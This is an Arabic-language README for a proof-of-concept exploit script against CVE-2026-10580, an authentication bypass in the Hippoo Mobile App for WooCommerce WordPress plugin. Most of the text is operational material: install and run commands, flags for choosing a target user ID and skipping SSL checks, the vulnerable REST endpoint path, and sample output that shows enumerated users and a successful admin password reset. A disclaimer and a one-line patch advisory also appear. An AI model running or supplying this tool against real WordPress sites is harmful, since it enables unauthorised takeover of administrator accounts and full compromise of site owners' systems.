
استغلال PoC لـ CVE-2026-10580 - تجاوز المصادقة في تطبيق Hippoo المحمول لـ WooCommerce <= 1.9.4 يؤدي إلى الاستيلاء على حساب المسؤول
هذه الأداة هي إثبات مفهوم لاستغلال الثغرة CVE-2026-10580، وهي ثغرة تجاوز المصادقة تؤثر على إضافة Hippoo Mobile App for WooCommerce لووردبريس (الإصدارات <= 1.9.4). تسمح الثغرة للمهاجمين غير الموثوقين بإعادة تعيين كلمة مرور أي مستخدم، بما في ذلك المسؤولين، مما يؤدي إلى الاستيلاء الكامل على الموقع.
⚠️ هام: هذه الأداة مخصصة لأغراض اختبار الأمان المصرح به والتعليم فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.
requestsتثبيت التبعيات:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
الاستغلال باستخدام معرف المسؤول الافتراضي (1) والتحقق من SSL:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
استهداف معرف مستخدم معين وتعطيل التحقق من SSL:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
التشغيل بدون الشعار:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
إذا كنت تستخدم إضافة Hippoo، قم بتحديثها فوراً إلى إصدار مصحح (>1.9.4). بالإضافة إلى ذلك:
/wp-json/wc-hippoo/v1/ext/wp/v2/usersهذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للتفاصيل.
0xgh057r3c0n
المؤلف غير مسؤول عن أي استخدام خاطئ لهذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
| الوسيط | الوصف |
|---|
-t, --target | عنوان URL لموقع ووردبريس الهدف (مثال: https://example.com) |
-p, --password | كلمة المرور الجديدة لتعيينها لحساب المسؤول |
-i, --id | معرف المستخدم للاستيلاء عليه (الافتراضي: 1) |
-k, --insecure | تخطي التحقق من شهادة SSL |
--no-banner | إخفاء شعار ASCII |